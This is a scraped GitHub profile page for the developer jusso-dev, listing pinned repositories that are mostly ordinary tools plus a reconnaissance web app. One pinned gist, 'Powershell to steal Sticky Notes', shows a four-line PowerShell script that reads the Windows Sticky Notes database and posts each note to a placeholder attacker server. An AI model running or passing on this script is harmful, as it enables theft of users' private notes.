Skip to content
View jusso-dev's full-sized avatar
🔨
Grinding
🔨
Grinding
  • Australia
  • 19:15 (UTC +10:00)
Block or Report

Block or report jusso-dev

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. ISMSearch ISMSearch Public

    Provides the ability to search the ISM in the form of indexed documents, making it a lot faster and easier to find the answers you need.

    JavaScript 1

  2. TellMeMore TellMeMore Public

    Web app to collectively preform reconnaissance on web hosted solutions

    C#

  3. Flute Flute Public

    Flute - a simple interface for creating, training and deploying machine learning models

    C#

  4. Powershell to steal Sticky Notes Powershell to steal Sticky Notes
    1
    $env:TEMP + "\PSSQLite\1.0.3\PSSQLite.psm1" | Import-Module 
    2
    $Database = $env:LOCALAPPDATA + "\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite"
    3
    $notes = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Note LIMIT 100"
    4
    foreach($note in $notes) { Invoke-RestMethod -Uri "https://bad-guys-server.com" -Method Post -Headers @{"Content-Type"="application/json"} -Body @{"NoteText"=$note.Text} | ConvertTo-Json }
  5. ApplicationInspector-action ApplicationInspector-action Public

    Github Action for Microsoft ApplicationInspector

    Dockerfile

  6. brainjsReactNativeExample brainjsReactNativeExample Public

    React Native example of how to use offline trained models for brain js

    JavaScript